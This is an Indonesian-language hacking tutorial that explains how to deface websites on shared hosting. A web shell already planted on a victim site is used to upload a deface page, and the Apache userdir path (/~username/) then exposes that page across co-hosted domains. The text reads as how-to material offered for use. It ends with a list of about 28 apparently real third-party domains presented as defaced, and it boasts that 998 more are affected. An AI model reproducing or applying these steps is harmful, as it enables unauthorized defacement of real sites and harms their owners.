Tutorial Deface Dengan Fake Root | User Enumeration

assalamualaikum, 

Sebenarnya saya sendiri bingung mau diaksih judul apa. Saya dapet dari threadnya bang Rebels di Forum Devilzc0de. Aslinya User Enumeration tapi tidak serumit itu. :v . Yasudah, langsung saja prakteknya.
Berikut bahan-bahan yang diperlukan :
Reverse IP
Shell yang sudah tertanam di web korban.

Exploit :
http://www.example.com/~root

Cek web yang sudah tertanam shell dengan exploit diatas.
Contoh :
http://www.autolovo.com/~root maka hasilnya forbidden
ScreenShoot : Click here


Langkah selanjutnya, upload script deface di public_html .
ex : http://autolovo.com/_-.htm

Oke, sekarang saatnya melihat domain ayng berada satu server dengan http://mysled.net/.
Sobat bisa menggunakan web Reverse IP diatas atau jika shell sobat sudah dilengkapi dengan tools Local Domain Viewer(tools 1n73ction sudah ada), tinggan klik menu DOMAIN.
Wow, ada 998 domain.
ScreenShoot : Click here





Nah, cara melihat hasil fake root nya exploit begini :
http://www.example.com /~dirdibelakang public_html / scriptmu.htm

Lihat dir dibelakang public-html
contoh , /home/autolovo/public_html/ .
Karena saya tadi mengupload script _-.htm di public_html,
coba cek salahsatu domain yang satu server dengan exploit diatas.
Contoh domain yang satu server dengan http://autolovo.com/ adalah http://hroyalinn.net/
Cek, http://hroyalinn.net/~autolovo/_-.htm
ScreenShoot : Click here


Defaced . :)
Hal itu akan terjadi di 998 domain lainnya tanpa ada susah susah melakukan mass deface server. Cukup tambahkan ~autolovo/_-.htm
See More :



http://onebikeshop.com/_-.htm
http://macroimpresos.com/~autolovo/_-.htm
http://amamavas.com/~autolovo/_-.htm
http://fiestasclandestinasfanta.com/~autolovo/_-.htm
http://popcorn.theservercluster.com/~autolovo/_-.htm
http://informacionlaboral.es/~autolovo/_-.htm
http://reddeforos.net/~autolovo/_-.htm
http://foroanuncio.com/~autolowo/_-.htm
http://aerumblog.com/~autolovo/_-.htm
http://josedavidortiz.com/~autolovo/_-.htm
http://team966.com/~autolovo/_-.htm
http://aitorguzman.com/~autolovo/_-.htm
http://aitorguzman.es/~autolovo/_-.htm
http://aragondiazyasociados.com/~autolovo/_-.htm
http://arnig.org/~autolovo/_-.htm
http://ctecnic.com/~autolovo/_-.htm
http://centosni.net/~autolovo/_-.htm
http://confeccionesdiana.com/~autolovo/_-.htm
http://eesanicaragua.com/~autolovo/_-.htm
http://fuerzacooperativa.com.ni/~autolovo/_-.htm
http://fenikado.com/~autolovo/_-.htm
http://geckotravel.net/~autolovo/_-.htm
http://hostalsanagustin.net/~autolovo/_-.htm
http://hostalsanagustin.com/~autolovo/_-.htm
http://mazzarelloescuelanormal.com/~autolovo/_-.htm
http://donpantaleon.net/~autolovo/_-.htm
http://restaurantevivian.com/~autolovo/_-.htm
http://hroyalinn.net/~autolovo/_-.htm

Dan masih banyak lagi. Ada 998 domain lebih. :)



NB :
.htm / .html sama aja kok :)

Sekian dan semoga bermanfaat.